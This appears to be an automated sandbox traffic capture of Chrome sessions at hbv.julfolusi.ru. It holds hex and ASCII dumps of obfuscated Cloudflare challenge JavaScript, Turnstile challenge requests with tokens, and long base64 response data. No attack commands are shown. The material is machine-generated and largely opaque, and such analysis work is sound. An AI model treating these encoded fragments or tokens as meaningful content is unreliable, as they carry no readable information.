                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 5b 67 4e 28 31 31 33 34 29 5d 28 6d 29 2c 6e 26 26 28 69 3d 6e 5b 31 5d 2c 6a 3d 70 61 72 73 65 49 6e 74 28 6e 5b 32 5d 2c 31 30 29 2c 6b 3d 70 61 72 73 65 49 6e 74 28 6e 5b 33 5d 2c 31 30 29 29 29 3b 65 6c 73 65 20 69 66 28 67 5b 67 4e 28 31 30 37 38 29 5d 28 6e 75 6c 6c 2c 67 5b 68 5d 29 29 72 65 74 75 72 6e 20 69 5b 6a 5d 3d 3d 3d 76 6f 69 64 20 30 3f 27 75 27 3a 27 78 27 7d 7d 65 6c 73 65 20 67 5b 67 4e 28 38 39 33 29 5d 3d 3d 3d 67 4e 28 38 30 35 29 3f 28 78 3d 66 5b 67 4e 28 31 34 39 37 29 5d 5b 67 4e 28 34 32 30 29 5d 5b 67 4e 28 31 33 34 37 29 5d 28 67 5b 67 4e 28 39 33 37 29 5d 28 27 23 27 2c 67 29 29 2c 78 26 26 69 28 78 29 29 3a 68 3d 4a 53 4f 4e 5b 67 4e 28 31 34 34 34 29 5d 28 65 29 3b 72 65 74 75 72 6e 20 6f 3d 7b 7d 2c 6f 5b 67 4e 28 39 34
                                                                              Data Ascii: [gN(1134)](m),n&&(i=n[1],j=parseInt(n[2],10),k=parseInt(n[3],10)));else if(g[gN(1078)](null,g[h]))return i[j]===void 0?'u':'x'}}else g[gN(893)]===gN(805)?(x=f[gN(1497)][gN(420)][gN(1347)](g[gN(937)]('#',g)),x&&i(x)):h=JSON[gN(1444)](e);return o={},o[gN(94
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 39 31 29 5d 3d 76 5b 68 4f 28 31 34 39 37 29 5d 5b 68 4f 28 39 37 38 29 5d 2c 67 5b 68 4f 28 36 34 35 29 5d 3d 68 4f 28 31 33 33 39 29 2c 67 5b 68 4f 28 33 39 36 29 5d 3d 68 4f 28 31 35 34 30 29 2c 73 5b 68 4f 28 31 36 30 35 29 5d 5b 68 4f 28 38 32 34 29 5d 28 67 2c 27 2a 27 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 65 6c 73 65 20 66 72 3d 64 5b 68 4f 28 38 38 31 29 5d 28 73 65 74 49 6e 74 65 72 76 61 6c 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 52 28 29 7d 2c 31 65 33 29 7d 65 6c 73 65 20 65 26 26 65 5b 68 4f 28 31 35 37 35 29 5d 3d 3d 3d 64 5b 68 4f 28 37 35 35 29 5d 26 26 65 5b 68 4f 28 33 39 36 29 5d 3d 3d 3d 64 5b 68 4f 28 35 30 34 29 5d 26 26 64 5b 68 4f 28 31 31 39 33 29 5d 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 2c 66 72 29 7d 29 2c 66 74 3d 21 5b 5d
                                                                              Data Ascii: 91)]=v[hO(1497)][hO(978)],g[hO(645)]=hO(1339),g[hO(396)]=hO(1540),s[hO(1605)][hO(824)](g,'*'));return![]}else fr=d[hO(881)](setInterval,function(){fR()},1e3)}else e&&e[hO(1575)]===d[hO(755)]&&e[hO(396)]===d[hO(504)]&&d[hO(1193)](clearInterval,fr)}),ft=![]
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 69 41 3d 67 4a 2c 64 3d 7b 27 55 72 4d 6a 46 27 3a 69 41 28 33 30 30 29 2c 27 67 4b 5a 51 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 44 4d 6c 63 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 57 68 77 64 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6c 56 6e 70 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 53 6b 65 65 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 4b 45 77 4f 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 53 51 53 4f 78 27 3a 66 75
                                                                              Data Ascii: ,f,g){return iA=gJ,d={'UrMjF':iA(300),'gKZQz':function(h,i){return h<i},'DMlcU':function(h,i){return h+i},'Whwdo':function(h,i){return i==h},'lVnpp':function(h,i){return h(i)},'Skeey':function(h,i){return h<<i},'KEwOS':function(h,i){return i&h},'SQSOx':fu
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 42 28 35 38 35 29 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 69 44 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 29 7b 69 66 28 69 44 3d 69 41 2c 69 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 64 5b 69 44 28 34 33 31 29 5d 28 4a 2c 69 5b 69 44 28 34 39 37 29 5d 29 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b 69 44 28 31 32 35 38 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 69 44 28 36 34 32 29 5d 5b 69 44 28 33 32 38 29 5d 5b 69 44 28 31 33 31 39 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 64 5b 69 44 28
                                                                              Data Ascii: B(585))},'g':function(i,j,o,iD,s,x,B,C,D,E,F,G,H,I,J,K,L,M,N,O){if(iD=iA,i==null)return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;d[iD(431)](J,i[iD(497)]);J+=1)if(K=i[iD(1258)](J),Object[iD(642)][iD(328)][iD(1319)](x,K)||(x[K]=E++,B[K]=!0),L=d[iD(
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 69 44 28 31 36 32 39 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 69 44 28 31 36 33 34 29 5d 28 48 2c 31 29 7c 64 5b 69 44 28 34 36 30 29 5d 28 4f 2c 31 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 69 44 28 35 36 33 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 69 44 28 31 31 33 39 29 5d 28 64 5b 69 44 28 31 36 33 34 29 5d 28 48 2c 31 29 2c 4f 29 2c 64 5b 69 44 28 38 38 39 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 69 44 28 35 36 33 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4f
                                                                              Data Ascii: )](o,H)),H=0):I++,s++);for(O=C[iD(1629)](0),s=0;8>s;H=d[iD(1634)](H,1)|d[iD(460)](O,1),j-1==I?(I=0,G[iD(563)](o(H)),H=0):I++,O>>=1,s++);}else{for(O=1,s=0;s<F;H=d[iD(1139)](d[iD(1634)](H,1),O),d[iD(889)](I,j-1)?(I=0,G[iD(563)](o(H)),H=0):I++,O=0,s++);for(O


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.64984135.190.80.14436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:30 UTC539OUTOPTIONS /report/v4?s=GA0KAF6bvAJqRzc9MT1TOuiCu7hTdqEDnnOwxXUGv9AwdQPkS7xFpUL%2BnFhtIWMNaUI3Z6mHq0oWe0I4VA8%2BVw17GcNYUd4ceEK%2BhcVdhPNeC5tDa%2FTmYZIaivx%2BYw%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Origin: https://hbv.julfolusi.ru
                                                                              Access-Control-Request-Method: POST
                                                                              Access-Control-Request-Headers: content-type
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:30 UTC336INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              access-control-max-age: 86400
                                                                              access-control-allow-methods: OPTIONS, POST
                                                                              access-control-allow-origin: *
                                                                              access-control-allow-headers: content-length, content-type
                                                                              date: Mon, 20 Jan 2025 13:17:30 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.649842104.18.95.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:30 UTC1174OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/605860113:1737375097:AQtvdO2D1SMmkKmXHkUChIKLql2iCbTUUA-etS4QEUs/904f584ecef78c84/B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azf HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 3206
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              CF-Chl-RetryAttempt: 0
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azf
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:30 UTC3206OUTData Raw: 76 5f 39 30 34 66 35 38 34 65 63 65 66 37 38 63 38 34 3d 67 74 59 46 69 46 72 46 4d 46 58 46 4a 46 2d 69 79 33 69 79 58 37 46 71 73 36 70 46 79 74 6a 4d 24 79 75 77 79 2d 72 46 41 32 79 65 35 79 33 4f 4e 48 31 2d 44 4e 59 79 6b 46 32 70 46 2d 24 79 25 32 62 6a 46 79 44 4a 32 70 7a 79 73 35 73 56 79 4c 56 79 6e 49 51 58 41 4a 79 48 73 31 79 6f 71 31 31 79 6f 79 71 31 79 6e 42 56 24 47 79 45 38 31 36 44 4d 33 50 67 72 41 58 79 43 79 6a 58 48 79 53 55 73 41 69 79 48 31 79 4e 67 42 2b 74 6e 70 79 71 4b 79 67 73 41 63 4f 69 41 54 38 2b 6e 31 46 4c 4e 41 71 65 72 48 79 4c 61 5a 79 71 75 56 46 78 67 41 4a 41 79 79 4c 63 46 79 4a 73 79 2b 58 33 4e 46 46 78 4b 79 6e 73 41 41 79 4c 55 79 4f 53 55 79 71 6e 77 55 49 2b 41 66 32 46 79 70 32 77 54 6c 79 2d 44 73 76 56
                                                                              Data Ascii: v_904f584ecef78c84=gtYFiFrFMFXFJF-iy3iyX7Fqs6pFytjM$yuwy-rFA2ye5y3ONH1-DNYykF2pF-$y%2bjFyDJ2pzys5sVyLVynIQXAJyHs1yoq11yoyq1ynBV$GyE816DM3PgrAXyCyjXHySUsAiyH1yNgB+tnpyqKygsAcOiAT8+n1FLNAqerHyLaZyquVFxgAJAyyLcFyJsy+X3NFFxKynsAAyLUyOSUyqnwUI+Af2Fyp2wTly-DsvV
                                                                              2025-01-20 13:17:30 UTC771INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:30 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 160296
                                                                              Connection: close
                                                                              cf-chl-gen: s4m5GU2rnSUiyJfpaoHKaRhU+W0qNnEz7sVflDipoYzEPOoo73jkZf1NO0Ng8vAmVSuqKPF21zg9j8sRkO8Qw0y/Em7/EsezG618k8jgG0zl5cTR1EEdw+ps7MJ+rBYWcz+ZfrSbRunKNOU2kL2yGng0NdDGyVH25Z20hfMWo5bqClbXNbl0AtnxxNTs8/e5fBWP6+kK3X88EU/M9cWFeMv0meWLwura6yn6MqpZhIpt+58tIr3N6ffo8ShAOocMmPlqb/Y2HqGnVRfdSdPUFKc758Y0+Vzpfm/ZaTrJsVbpaZqk2hzSSWt4oTA/46vZJ++hb77LEER1oOhxxyHe9gg47EsDTJ3owiDKK1tiBuIWonuNhCIz9OaOWXJdEZYxBdetkzHXkSQtYSlPsFuJMZyJUgUTB/RyD2LCA/Ir3OJffuLh6Jjea5hJJ35luU7/SrETjPevOTDqPZLHTqFdLevBudmeLs9oyqkdE8C+3DJjDh394V3obOyBWKC1g7O4$fbjVm6FylAins+rHj0uAZQ==
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f585a0c414257-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:30 UTC598INData Raw: 6f 6f 43 7a 67 70 61 34 68 35 71 6b 6c 72 65 63 6e 72 36 70 6a 73 79 4f 78 38 44 4d 70 34 6d 53 78 4a 6e 63 72 37 4b 73 30 61 44 41 72 74 71 64 30 63 58 57 77 73 61 38 36 4f 62 75 32 71 58 68 71 66 44 48 77 2b 72 74 38 73 66 42 77 75 6e 6f 7a 64 53 39 39 74 6e 4f 33 65 57 2f 38 4e 62 6b 42 74 50 33 43 77 62 46 43 76 33 67 37 64 76 39 36 64 38 53 44 65 67 62 46 66 77 48 2f 66 6e 2b 48 39 6a 36 33 53 50 63 2f 68 2f 6e 2f 65 45 71 36 41 55 49 4a 69 44 73 4c 79 6a 72 2f 67 41 43 42 51 4d 45 43 4f 38 35 4c 79 6b 6a 45 6a 6b 52 41 54 51 6a 50 42 4a 43 46 69 45 2f 4b 69 4d 37 43 67 30 30 4c 6a 52 4a 51 7a 6f 78 51 7a 46 54 46 6b 6b 34 56 6a 74 6b 59 68 73 2b 57 54 51 6f 56 54 5a 61 4b 55 6f 72 57 69 70 4f 54 47 35 45 52 47 51 79 64 7a 68 75 61 54 68 48 56 6c 42
                                                                              Data Ascii: ooCzgpa4h5qklrecnr6pjsyOx8DMp4mSxJncr7Ks0aDArtqd0cXWwsa86Obu2qXhqfDHw+rt8sfBwunozdS99tnO3eW/8NbkBtP3CwbFCv3g7dv96d8SDegbFfwH/fn+H9j63SPc/h/n/eEq6AUIJiDsLyjr/gACBQMECO85LykjEjkRATQjPBJCFiE/KiM7Cg00LjRJQzoxQzFTFkk4VjtkYhs+WTQoVTZaKUorWipOTG5ERGQydzhuaThHVlB
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 4a 6b 66 7a 78 2b 64 46 6c 41 5a 6f 56 6b 62 4a 42 50 6b 55 52 4a 66 32 4e 2f 54 6d 35 54 61 56 6d 61 55 33 79 50 57 70 69 57 62 6e 79 62 68 57 2b 6c 70 71 6d 65 59 34 4f 50 61 5a 36 46 6a 48 47 56 6a 34 65 6d 69 59 75 56 71 6f 69 4b 6b 35 61 6f 6a 4a 48 43 76 72 47 46 73 62 44 46 6c 61 75 49 78 5a 33 43 78 4d 65 62 6e 4e 48 50 72 4b 53 59 6b 61 33 49 6c 62 6e 4f 7a 4a 75 64 33 5a 6d 74 76 4b 4b 7a 35 74 66 46 75 4e 76 45 6f 4c 65 75 71 73 76 68 30 62 4f 32 72 63 44 46 77 38 50 54 2b 66 6e 75 76 63 48 5a 2f 50 72 32 2f 67 50 78 2b 77 58 4c 31 41 48 63 33 51 45 4c 38 41 2f 6c 34 77 30 48 30 4e 48 6a 37 4e 7a 63 37 76 6f 59 39 2b 77 45 37 42 41 46 39 42 63 42 35 66 4d 64 44 65 44 6c 35 69 6a 38 4a 78 51 4f 49 2b 30 70 4f 44 41 48 4f 53 67 71 4c 79 35 44 45
                                                                              Data Ascii: Jkfzx+dFlAZoVkbJBPkURJf2N/Tm5TaVmaU3yPWpiWbnybhW+lpqmeY4OPaZ6FjHGVj4emiYuVqoiKk5aojJHCvrGFsbDFlauIxZ3CxMebnNHPrKSYka3IlbnOzJud3ZmtvKKz5tfFuNvEoLeuqsvh0bO2rcDFw8PT+fnuvcHZ/Pr2/gPx+wXL1AHc3QEL8A/l4w0H0NHj7Nzc7voY9+wE7BAF9BcB5fMdDeDl5ij8JxQOI+0pODAHOSgqLy5DE
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 32 65 6b 68 4a 67 6f 43 4a 66 55 78 63 63 35 52 70 6d 48 6d 4f 64 48 74 57 61 4a 74 6f 65 57 78 67 6e 59 79 68 6f 34 43 44 70 32 69 56 69 71 43 72 6e 6f 2b 6e 61 36 52 76 5a 33 56 77 74 4b 4b 6f 6d 59 39 34 69 72 71 31 76 36 71 55 73 33 65 6d 66 62 4b 61 67 36 65 6e 71 4c 2b 61 72 72 48 51 6a 36 75 52 30 4a 54 49 69 36 2f 53 76 4b 6a 4e 31 4e 7a 5a 6d 39 72 57 77 65 57 34 36 63 6e 49 75 65 75 73 34 37 37 4c 32 36 75 78 7a 36 66 57 36 2f 61 30 35 72 50 49 37 38 7a 53 2f 73 37 35 74 63 7a 64 42 2b 62 54 78 51 66 73 41 51 4d 41 34 51 50 2b 7a 65 37 66 35 51 55 56 36 74 4c 34 46 75 33 32 49 50 6e 67 33 42 72 61 39 51 45 64 34 50 41 44 48 77 4c 37 43 77 30 6f 37 53 30 41 45 66 45 52 43 7a 62 33 45 51 38 36 4a 79 73 4e 51 53 73 37 43 30 4d 45 50 78 38 54 52 42
                                                                              Data Ascii: 2ekhJgoCJfUxcc5RpmHmOdHtWaJtoeWxgnYyho4CDp2iViqCrno+na6RvZ3VwtKKomY94irq1v6qUs3emfbKag6enqL+arrHQj6uR0JTIi6/SvKjN1NzZm9rWweW46cnIueus477L26uxz6fW6/a05rPI78zS/s75tczdB+bTxQfsAQMA4QP+ze7f5QUV6tL4Fu32IPng3Bra9QEd4PADHwL7Cw0o7S0AEfERCzb3EQ86JysNQSs7C0MEPx8TRB
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 59 6d 78 30 68 59 52 6a 56 5a 4e 5a 56 56 71 53 63 49 2b 58 6c 57 32 52 63 47 46 64 6d 5a 46 66 67 57 6d 6a 68 58 65 46 6b 48 70 35 73 59 61 4a 6e 57 36 72 64 58 69 43 74 6f 32 47 71 62 61 6f 6d 36 4f 62 78 4c 50 44 6c 36 6d 6c 6f 5a 32 4c 70 49 43 34 69 71 4f 6e 6b 4e 43 4c 7a 4a 61 58 79 74 47 79 7a 4b 32 73 6e 65 47 32 76 4c 36 68 6f 37 61 66 76 64 57 63 6f 2b 66 4d 70 71 65 2b 79 4c 2b 75 7a 4f 37 53 79 4e 48 71 78 75 2f 6b 75 76 72 31 76 62 7a 65 41 4e 6b 45 33 74 49 48 36 74 76 6f 36 73 59 4d 32 4f 72 6a 79 38 73 4c 43 74 59 4c 44 2b 59 4c 36 41 76 6c 39 2f 4d 4f 49 39 33 72 2b 78 7a 2b 38 78 4d 6a 2b 76 34 74 4a 75 77 4e 2f 41 67 4e 4d 53 49 4f 43 52 67 6f 44 68 49 73 2b 79 63 76 39 79 72 37 48 52 6f 57 46 54 45 2b 2f 6a 51 48 4a 67 73 37 48 51 6f
                                                                              Data Ascii: Ymx0hYRjVZNZVVqScI+XlW2RcGFdmZFfgWmjhXeFkHp5sYaJnW6rdXiCto2Gqbaom6ObxLPDl6mloZ2LpIC4iqOnkNCLzJaXytGyzK2sneG2vL6ho7afvdWco+fMpqe+yL+uzO7SyNHqxu/kuvr1vbzeANkE3tIH6tvo6sYM2Orjy8sLCtYLD+YL6Avl9/MOI93r+xz+8xMj+v4tJuwN/AgNMSIOCRgoDhIs+ycv9yr7HRoWFTE+/jQHJgs7HQo
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 5a 47 53 67 32 78 72 6a 35 52 66 66 4a 68 31 6c 58 36 58 59 5a 57 6e 6f 57 68 7a 58 71 71 6d 62 4b 47 68 62 6e 36 71 70 49 43 4a 6b 36 69 4e 72 37 75 4a 69 6f 70 79 6f 4b 39 38 68 4a 53 57 79 4d 69 6c 74 5a 6d 49 6d 36 54 41 69 61 36 79 69 38 53 64 30 37 48 43 79 62 69 75 70 38 6d 73 33 4c 61 62 71 74 37 66 7a 62 58 54 33 4d 57 30 6e 65 71 34 71 72 6e 65 32 76 48 66 79 4b 36 75 36 74 44 6f 35 72 48 77 7a 76 37 77 36 76 61 35 77 64 76 63 76 73 49 47 2f 50 6a 57 36 4e 58 63 79 41 30 49 35 2f 76 79 45 66 37 75 44 42 6b 61 2b 52 4c 71 42 77 48 59 33 52 77 41 41 78 63 53 2f 68 59 63 35 50 54 30 39 79 2f 71 37 4f 67 43 36 66 34 49 44 7a 63 70 38 50 67 4b 2b 6a 63 4f 44 67 77 43 45 52 73 68 48 79 59 65 42 6b 6b 2b 49 42 6b 39 52 51 38 4d 4d 55 59 51 4b 6b 67 6c
                                                                              Data Ascii: ZGSg2xrj5RffJh1lX6XYZWnoWhzXqqmbKGhbn6qpICJk6iNr7uJiopyoK98hJSWyMiltZmIm6TAia6yi8Sd07HCybiup8ms3Labqt7fzbXT3MW0neq4qrne2vHfyK6u6tDo5rHwzv7w6va5wdvcvsIG/PjW6NXcyA0I5/vyEf7uDBka+RLqBwHY3RwAAxcS/hYc5PT09y/q7OgC6f4IDzcp8PgK+jcODgwCERshHyYeBkk+IBk9RQ8MMUYQKkgl
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 31 6e 61 6e 5a 67 66 35 52 2b 63 6c 2b 53 6c 32 53 48 65 4b 43 49 69 62 47 67 6a 71 6c 6d 72 61 4f 32 61 71 61 6d 71 34 39 30 6a 4c 36 4f 6a 70 47 34 6a 38 56 38 78 35 65 67 6e 61 43 49 74 61 47 33 7a 63 75 71 6f 71 76 53 6c 71 54 48 70 61 72 49 70 70 33 52 75 5a 71 38 72 62 58 6a 6c 36 48 67 70 63 4f 35 34 72 33 64 31 75 61 73 72 73 4c 73 73 65 6e 6d 37 74 6e 33 38 4f 6a 50 2b 75 6f 41 7a 63 48 68 32 38 48 59 34 51 54 66 35 4f 58 44 39 63 72 4b 44 74 33 72 34 52 4c 71 44 74 58 71 31 66 41 4b 47 76 4d 48 48 2b 6a 72 44 51 33 2b 41 39 30 62 41 2b 59 47 38 79 63 45 36 69 66 6f 42 65 63 4e 4c 66 41 45 4b 43 49 77 47 69 6f 63 4e 51 59 4d 44 54 73 75 41 42 55 33 4a 7a 30 65 4f 30 49 69 54 54 55 4d 51 67 67 6f 4c 55 41 73 55 69 78 53 4a 56 64 4f 53 79 38 79 50
                                                                              Data Ascii: 1nanZgf5R+cl+Sl2SHeKCIibGgjqlmraO2aqamq490jL6OjpG4j8V8x5egnaCItaG3zcuqoqvSlqTHparIpp3RuZq8rbXjl6HgpcO54r3d1uasrsLssenm7tn38OjP+uoAzcHh28HY4QTf5OXD9crKDt3r4RLqDtXq1fAKGvMHH+jrDQ3+A90bA+YG8ycE6ifoBecNLfAEKCIwGiocNQYMDTsuABU3Jz0eO0IiTTUMQggoLUAsUixSJVdOSy8yP
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 4e 6b 61 68 6b 5a 49 61 4d 6f 6e 70 75 6d 4b 42 6f 73 34 71 74 6e 61 35 78 63 49 57 47 72 58 61 4b 75 4a 65 61 72 72 36 36 6b 4b 43 4f 67 37 6a 4b 6f 61 61 61 69 4d 44 4f 77 71 62 47 7a 4b 43 6b 6f 74 4f 55 30 5a 72 57 32 62 57 35 6b 62 61 2b 6e 74 50 5a 6e 71 37 42 36 4c 36 6c 7a 4c 33 64 35 4d 7a 4a 33 36 6e 49 7a 61 76 42 39 2f 44 6d 2b 62 6a 52 30 72 37 36 75 2f 58 5a 31 64 79 37 76 76 50 47 36 4e 72 6a 78 51 50 71 35 74 44 4a 2b 2b 37 66 46 2f 37 79 45 50 66 52 45 2b 62 79 2b 66 48 59 45 68 6a 76 4a 76 34 57 49 78 6f 59 4c 42 63 56 2b 65 77 43 47 69 66 79 4b 53 34 57 4c 44 62 32 4d 7a 77 31 4a 65 38 37 2f 44 73 4e 41 77 38 63 45 43 55 30 4b 51 63 63 49 6b 30 58 4b 79 38 67 52 53 42 45 4b 45 31 46 4c 7a 51 33 4d 56 49 36 4e 6c 73 34 58 42 68 66 4d 45
                                                                              Data Ascii: NkahkZIaMonpumKBos4qtna5xcIWGrXaKuJearr66kKCOg7jKoaaaiMDOwqbGzKCkotOU0ZrW2bW5kba+ntPZnq7B6L6lzL3d5MzJ36nIzavB9/Dm+bjR0r76u/XZ1dy7vvPG6NrjxQPq5tDJ++7fF/7yEPfRE+by+fHYEhjvJv4WIxoYLBcV+ewCGifyKS4WLDb2Mzw1Je87/DsNAw8cECU0KQccIk0XKy8gRSBEKE1FLzQ3MVI6Nls4XBhfME
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 6f 6d 75 6b 62 57 4a 72 73 33 4f 48 72 71 39 78 74 59 6d 48 69 33 4b 6e 6b 37 47 36 74 33 71 65 6e 49 32 66 68 70 6d 66 6b 72 75 49 74 5a 66 41 6f 4d 6d 6c 73 4b 69 4f 72 4c 53 31 79 62 61 52 32 39 57 2f 72 73 47 71 73 73 4b 64 35 70 36 2b 30 38 69 6f 74 64 6e 4c 35 4e 79 71 6f 38 7a 67 71 72 50 41 78 73 72 68 32 50 58 64 37 2b 72 58 31 62 6a 4c 7a 74 75 2f 41 66 76 39 2b 64 6e 38 78 76 33 67 43 4d 6f 53 34 51 48 7a 46 75 6b 47 36 41 58 4d 45 42 4d 47 37 52 45 41 49 76 73 56 41 53 49 53 45 79 50 62 47 2b 6b 6b 2b 75 55 6d 36 41 6e 6b 46 65 34 49 45 66 63 51 45 54 72 35 37 69 38 4e 41 50 49 56 50 2f 55 6a 45 41 45 68 4a 52 73 64 46 43 63 34 4b 67 49 63 49 46 51 64 45 79 68 46 4a 53 55 36 4e 43 56 4b 55 31 4d 2f 4f 69 30 61 50 42 63 75 56 31 63 70 4d 30 63
                                                                              Data Ascii: omukbWJrs3OHrq9xtYmHi3Knk7G6t3qenI2fhpmfkruItZfAoMmlsKiOrLS1ybaR29W/rsGqssKd5p6+08iotdnL5Nyqo8zgqrPAxsrh2PXd7+rX1bjLztu/Afv9+dn8xv3gCMoS4QHzFukG6AXMEBMG7REAIvsVASISEyPbG+kk+uUm6AnkFe4IEfcQETr57i8NAPIVP/UjEAEhJRsdFCc4KgIcIFQdEyhFJSU6NCVKU1M/Oi0aPBcuV1cpM0c
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 36 75 63 70 61 61 78 64 48 61 71 6e 49 32 4e 65 72 68 2f 65 70 64 39 76 36 2b 52 67 5a 75 57 74 4c 53 74 70 4d 69 50 76 62 44 51 6a 4c 2f 4f 30 4b 44 50 6f 71 62 51 7a 4b 6e 56 6c 39 69 65 34 39 6e 57 75 64 53 37 35 39 66 64 76 39 75 73 7a 37 33 47 33 63 54 7a 7a 63 58 6a 30 65 4c 4d 37 37 48 78 38 37 6a 59 33 39 4c 30 42 62 72 6a 77 66 59 41 34 67 48 67 35 4e 33 59 32 67 2f 6a 33 63 73 56 43 68 67 47 31 66 54 5a 43 4e 62 38 37 76 54 73 46 4e 30 63 45 4e 66 6d 4a 69 4d 69 36 69 33 65 36 75 6f 75 4b 69 4c 75 4e 53 38 56 41 54 54 34 37 77 59 36 4e 79 37 36 39 78 55 77 47 66 77 51 47 79 38 56 53 6b 51 39 4b 43 30 76 43 42 34 52 4a 53 49 69 4d 54 59 4e 4c 31 70 52 4e 6a 67 70 52 6c 6c 42 53 6a 4d 72 50 53 52 53 4f 32 42 65 4a 30 68 68 50 6b 35 66 59 79 4d 70
